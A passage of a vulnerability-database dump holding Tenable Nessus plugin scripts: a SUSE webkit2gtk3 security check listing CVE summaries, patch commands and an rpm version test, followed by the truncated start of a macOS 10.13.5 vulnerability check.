corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof\nuser-interface information (about whether the entire content is\nderived from a valid TLS session) via a crafted website that sends a\n401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to\nexecute arbitrary code via special characters that trigger command\ninjection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers a\nWebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit'\ncomponent allowed attackers to trigger an assertion failure by\nleveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nwebsite (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a\ndenial of service (memory corruption) via a crafted website\n(bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain\nsensitive credential information that is transmitted during a CSS\nmask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (buffer overflow\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers an\n@generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages a\ngetWasmBufferFromValue out-of-bounds read during WebAssembly\ncompilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to\noverwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages type\nconfusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\nwebkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\nleading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability\nallowed remote attackers to inject arbitrary web script or HTML via a\ncrafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly\nfailed to use system proxy settings for WebSocket connections. As a\nresult, users could be deanonymized by crafted websites via a\nWebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to\nperform TLS certificate verification for WebSocket connections\n(bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash\nwhen atk_object_ref_state_set is called on an AtkObject that's being\ndestroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage\nof 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank\npage.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish\nthe load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the\nWeb Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to\nmissing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed\nquickly.\n\nFix a network process crash when load is cancelled while searching for\nstored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\ndisabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the\n&Atilde;&cent;&Acirc;&#128;&Acirc;&#156;system&Atilde;&cent;&Acirc;&#1\n28;&Acirc;&#157; CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some\ncases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems\nwith broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\nsupport.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and\nlibwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated\ncompositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace\nwebkit_form_submission_request_get_text_fields() that is now\ndeprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate\nweb-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via\nWebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and\npixels.\n\nEnsure cookie operations take effect when they happen before a web\nprocess has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in\nWebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or\nnot.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13884/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13885/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7160/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11712/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11713/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12911/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4088/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4096/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4101/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4113/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4114/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4119/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4121/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4122/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4133/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4162/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4163/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4200/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4204/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4246/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183387-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a02e1c7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2432=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-20T13:53:13", "description": "The remote host is running a version of macOS / Mac OS X that is 10.13.x prior to 10.13.5. It is, therefore, affected by multiple vulnerabilities.\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-05T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4141", "CVE-2018-4159", "CVE-2018-4180", "CVE-2018-4181", "CVE-2018-4182", "CVE-2018-4183", "CVE-2018-4184", "CVE-2018-4193", "CVE-2018-4194", "CVE-2018-4196", "CVE-2018-4198", "CVE-2018-4202", "CVE-2018-4211", "CVE-2018-4217", "CVE-2018-4219", "CVE-2018-4221", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4227", "CVE-2018-4228", "CVE-2018-4229", "CVE-2018-4230", "CVE-2018-4234", "CVE-2018-4235", "CVE-2018-4236", "CVE-2018-4237", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4242", "CVE-2018-4243", "CVE-2018-4249", "CVE-2018-4251", "CVE-2018-4253", "CVE-2018-4254", "CVE-2018-4255", "CVE-2018-4256", "CVE-2018-4257", "CVE-2018-4258", "CVE-2018-4404", "CVE-2018-4478", "CVE-2018-5383", "CVE-2018-7584"], "modified": "2019-11-04T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_13_5.NASL", "href": "https://www.tenable.com/plugins/nessus/110324", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110324);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4141\",\n \"CVE-2018-4159\",\n \"CVE-2018-4180\",\n \"CVE-2018-4181\",\n \"CVE-2018-4182\",\n \"CVE-2018-4183\",\n \"CVE-2018-4184\",\n \"CVE-2018-4193\",\n \"CVE-2018-4194\",\n \"CVE-2018-4196\",\n \"CVE-2018-4198\",\n \"CVE-2018-4202\",\n \"CVE-2018-4211\",\n \"CVE-2018-4217\",\n \"CVE-2018-4219\",\n \"CVE-2018-4221\",\n \"CVE-2018-4223\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4227\",\n \"CVE-2018-4228\",\n \"CVE-2018-4229\",\n \"CVE-2018-4230\",\n \"CVE-2018-4234\",\n \"CVE-2018-4235\",\n \"CVE-2018-4236\",\n \"CVE-2018-4237\",\n \"CVE-2018-4240\",\n \"CVE-2018-4241\",\n \"CVE-2018-4242\",\n \"CVE-2018-4243\",\n \"CVE-2018-4249\",\n \"CVE-2018-4251\",\n \"CVE-2018-4253\",\n \"CVE-2018-4254\",\n \"CVE-2018-4255\",\n \"CVE-2018-4256\",\n \"CVE-2018-4257\",\n \"CVE-2018-4258\",\n \"CVE-2018-4404\",\n \"CVE-2018-4478\",\n \"CVE-2018-5383\",\n \"CVE-2018-7584\"\n );\n script_bugtraq_id(\n 103204,\n 104378,\n 104879,\n 104888,\n 104889,\n 104897,\n 107135\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-7-23-2\");\n\n script_name(english:\"macOS 10.13.x < 10.13.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is\n10.13.x prior to 10.13.5. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208849\");\n # https://lists.apple.com/archives/security-announce/2018/Jul/msg00009.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68a789b4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 